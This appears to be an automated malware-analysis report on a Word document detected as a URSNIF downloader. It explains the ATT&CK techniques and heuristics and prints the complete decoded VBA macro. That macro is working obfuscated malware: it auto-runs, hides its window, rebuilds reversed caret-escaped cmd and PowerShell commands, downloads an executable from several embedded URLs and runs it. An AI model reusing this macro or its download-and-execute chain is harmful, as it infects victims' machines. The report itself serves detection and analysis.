Verdict: MALICIOUS
Risk Score: 172

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.URSNIF-6729855-3. It contains a VBA macro whose AutoOpen subroutine runs as soon as the document is opened with macros enabled and ends in a VBA.Shell call, which executes an arbitrary command line. That command is never present as a literal: it is assembled from dozens of short concatenated fragments returned by three helper Functions, and the real statements are interleaved with calls to Hour on random strings, which do nothing and exist only as padding. Read statically, the assembled command starts cmd.exe with delayed expansion (/V:ON), uses caret (^) escapes throughout, stores a reversed PowerShell script in an environment variable, reverses it back with a for /L loop and calls it; the PowerShell creates a Net.WebClient, iterates over five '@'-separated URLs, downloads the first one that answers into $env:public as 22.exe with DownloadFile and runs it with Invoke-Item. The window-style argument 10 - 10 evaluates to 0 (vbHide), so no console window is shown. The chain therefore also covers T1059.003 (Windows Command Shell) and T1059.001 (PowerShell), which the tag list above omits. The AutoOpen name is the legacy Word auto-execution trigger: it explains how the macro gets initial execution, and is not family evidence on its own.
Heuristics (7)

- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings). Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
  Hour "86907533" + "FVM" + "CEVqmvjjdiaHq" + "fiwOV"
  VBA.Shell CleanString(nw) + fBwHPqz + XIiGasEt + zLoVYvwUjd + wNVRaCTTRDZ + ZmsVpwIv + vWEPjzldwzlrz + jBcjRviKanpC, 10 - 10
  Hour "ik" + "205540774"
  Only the middle line matters; the two Hour calls around it are junk. The Shell argument is built from Function return values and undefined names, so the command line never appears as a literal string anywhere in the module.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On _
  (the continuation lines read On Error Resume Next, which silences every runtime error inside the subroutine.)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's generic description adds that no modern VBA project was recovered and no stronger macro-virus family marker was present; for this sample that part is contradicted by the extraction below, which did decode the VBA project (macros.bas), so treat this finding as corroboration of the AutoOpen trigger rather than as independent evidence. It is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace present in any Office document with drawing content and is not a network indicator. The sample's real download URLs are not stored as literals; they only appear after the macro's caret stripping and string reversal.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5581 bytes |

SHA-256: 3a3a3aff9dff2a7bafc4be734b3ca555619093b639ff3e53eb970004ba00fb20

Detection
- ClamAV: No threats found. The URSNIF signature above matched the document itself; the decoded macro text alone does not match it, so a clean result on macros.bas does not weaken the verdict.
- Obfuscation or payload: likely. 58 of 94 identifiers look randomly generated (e.g. 'hIvqLcjTiDitUI'); 4 string-concatenation chain(s), consistent with name-mangling obfuscation.
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "dQWziwtvfzDdA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "8130" + "NCCBXS" + "419625218" + "fRbaJV"
Hour "2226" + "fwrjLCb" + "338855919" + "jmiklLwjLlX"
Hour "98634570" + "2629" + "514781394" + "6252"
Hour "429" + "8481"
Hour "86907533" + "FVM" + "CEVqmvjjdiaHq" + "fiwOV"
VBA.Shell CleanString(nw) + fBwHPqz + XIiGasEt + zLoVYvwUjd + wNVRaCTTRDZ + ZmsVpwIv + vWEPjzldwzlrz + jBcjRviKanpC, 10 - 10
Hour "ik" + "205540774"
End Sub
Attribute VB_Name = "FEialRJiNBcZf"
Function zLoVYvwUjd()
On _
Error _
Resume _
Next
Hour "s" + "5386"
Hour "wGZrnWV" + "GiX"
nKYwiHm = "cmd /V^" + ":^ON/C" + Chr(2 + 5 + 4 + 4 + 19) + "^s^e^" + "t " + "^i"
Hour "2786" + "FvZm"
Hour "340207480" + "HTEsjuqK" + "pkDwRwEFuU" + "GBE"
ucTCcZbivf = "^T=" + "^ " + "^ " + "^ ^ " + "^" + " ^ " + "^ " + "^" + " ^}" + "^"
Hour "E" + "891"
Hour "Ti" + "499555232"
RtNImGt = "}^" + "{^hc^t" + "^a" + "c^" + "};ka^e" + "rb^" + ";^Hnd$^"
Hour "idCj" + "sfK"
Hour "63727881" + "uT"
nUHkziLB = " m" + "e^tI-^e" + "^" + "kovn^I" + "^;" + ")Hn^d"
Hour "Bq" + "SikGPo" + "hpKAQLVDG" + "TBZmbivUnVb"
Hour "Q" + "293078682" + "148581488" + "c"
awcur = "^$^ ^" + ",^" + "w" + "^jW" + "^$(^" + "e^l" + "iFd" + "^a"
Hour "YN" + "524895905" + "DizLjzU" + "446"
Hour "GYOO" + "bDVKQFYPHJ"
Hour "En" + "9363"
Hour "Rrrv" + "4893"
Hour "bSUtjuroKZi" + "2173" + "96499098" + "7485"
EzInq = "^o^lnwo" + "^D.^jk^" + "d" + "^" + "${yr^t{" + ")I"
Hour "E" + "RmnvPiW" + "Tcu" + "hIvqLcjTiDitUI"
Hour "ahc" + "5280" + "249075173" + "V"
zzXAiiz = "Cz" + "$^ n" + "i ^w" + "^jW" + "$(hc" + "^aero^"
Hour "RsacB" + "Rbn"
Hour "252944644" + "354663578" + "YEdzjclrN" + "1969"
pcAkdrk = "f^;" + "^'e" + "x^e" + ".'+" + "Tv^s$+" + "'\^'^+c" + "^i^l^bu" + "p:vne$^" + "=Hn^" + "d$;^'2"
Hour "281874079" + "GVpAlztd" + "6712" + "ZTZTBDR"
Hour "GFWiocw" + "tYjQUXXQTH" + "mfb" + "UEwk"
lNvzrDHjfhQ = "2" + "'^ " + "^" + "=^ ^Tvs" + "$;)^'" + "^@'" + "(ti^l^p"
Hour "389623615" + "75102155"
Hour "Uv" + "9442"
Hour "oEbjMEBGUuIFwB" + "3359"
LBzPYs = "^S" + "^.'^b^" + "1C^Sj^" + "5b/h" + "c^.aide" + "mk" + "^am//:" + "^" + "p^" + "tt^h^@^"
zLoVYvwUjd = nKYwiHm + ucTCcZbivf + RtNImGt + nUHkziLB + awcur + EzInq + zzXAiiz + pcAkdrk + lNvzrDHjfhQ + LBzPYs
Hour "EJGiLBaqs" + "GLAPVsZj" + "362946897" + "saA"
Hour "467210765" + "UZa" + "toDa" + "2457"
Hour "340525479" + "PmV"
End Function
Function wNVRaCTTRDZ()
On _
Error _
Resume _
Next
Hour "225380717" + "B" + "8428" + "463"
Hour "Mv" + "210913312"
Hour "3251" + "in" + "W" + "qp"
EYJaaSAzFL = "el" + "^a^m^P" + "^0^O/a" + "c.^e" + "rv^eil" + "^al"
Hour "1624" + "3628"
Hour "Jla" + "zDofMY" + "iXGGIrkjWiZFvI" + "469"
Hour "lk" + "9346"
ctUrwAoA = "//:^" + "pt^" + "t^h" + "@ViXSF" + "^h^J^" + "8^B^I" + "/s^e^" + ".^e" + "s^o" + "^j^y^"
Hour "516834778" + "426093423" + "iWRlDvCSo" + "2684"
Hour "tQ" + "QjvfF"
Hour "188991233" + "30295005" + "LiwmY" + "v"
Hour "Lr" + "1400" + "182748928" + "r"
BnNNiqN = "a" + "mni//^" + ":^p^t" + "^t^h@x^" + "pC3V96/" + "^ua^" + ".moc^." + "r^a^" + "l^"
Hour "2474" + "P"
Hour "wA" + "iTU"
Hour "riJ" + "wC" + "vIFdtWOTa" + "dtq"
Hour "PfUqPwRqJ" + "518810957" + "DqBZB" + "TnHw"
Hour "Eh" + "OkfzJj" + "Vh" + "dzhYiB"
wYGwRiwN = "uc^s" + "^avcn" + "//" + ":p^t" + "t" + "h^@6" + "^Z" + "6^j^" + "g" + "lyz^o/" + "mo"
Hour "XrG" + "172967593"
Hour "avsVK" + "Yajkpp" + "44911211" + "sDAuIZWOP"
Hour "zlMqp" + "SCiCHm"
Hour "7585" + "jhCtpbqi"
OvrYihRHqk = "c.^aid" + "n^a" + "^l^" + "otro^hs" + "^o^lo" + "^b//:" + "p^t"
Hour "5533" + "252"
Hour "274389555" + "3305" + "hiETDKCc" + "YUhlK"
Hour "9277" + "HvlRPQk" + "133862641" + "6966"
Hour "8542" + "wujJ"
ZnFmUOwvFw = "th'^" + "=I" + "Cz$^" + ";" + "tnei" + "lC" + "b^e" + "^W" + "." + "t^e"
Hour "zQCCC" + "8310"
tjVsmJ = "N^ " + "^tc^e^j" + "^b^o-" + "wen^=^j" + "^k^" + "d^" + "$ ^" + "l^lehs" + "re" + "^wop&&^"
wNVRaCTTRDZ = EYJaaSAzFL + ctUrwAoA + BnNNiqN + wYGwRiwN + OvrYihRHqk + ZnFmUOwvFw + tjVsmJ
Hour "9074" + "254946117" + "897" + "jzOzwjI"
End Function
Function ZmsVpwIv()
On _
Error _
Resume _
Next
Hour "7359" + "206177843"
Hour "wWDQh" + "325981905" + "6192" + "10554456"
Hour "Yq" + "iLnoY"
hOZiYJt = "f^o" + "r /" + "^L %" + "^" + "M ^in" + " (3^" + "64" + "^;^-^1;" + "0)d^o" + " ^s^" + "e^t Cr" + "^9^"
Hour "WhpsvphHLl" + "7671"
Hour "411580923" + "WR"
JwLDUoklwwW = "S=!" + "Cr" + "^9" + "^S" + "!!^i^T"
Hour "90145346" + "360860213" + "irSFMMLThlGGI" + "GKzvOjNaDKc"
Hour "ATFPNiaaX" + "bLiOizj" + "GrFFwV" + "353048503"
ujzYGDROIO = ":~%" + "^M" + "," + "1" + "!&&i^f" + " %^M" + "=^=^0 "
Hour "Phsq" + "UTluGAHN"
Hour "oId" + "3278"
Hour "1290" + "209487725" + "suWj" + "UviIRY"
CzitHUd = "c^" + "a" + "^l" + "l " + "%Cr" + "^9" + "^S:^~^6" + "%" + Chr(2 + 5 + 4 + 4 + 19) + " "
ZmsVpwIv = hOZiYJt + JwLDUoklwwW + ujzYGDROIO + CzitHUd
Hour "bmO" + "335833382" + "6198" + "442862619"
Hour "102441879" + "KTznlOzn" + "443004763" + "cGpntA"
Hour "5901" + "350184590" + "8034" + "HnnudT"
Hour "405226411" + "oqX" + "h" + "zj"
Hour "494131470" + "243852761" + "cNtYiHjhP" + "7523"
End Function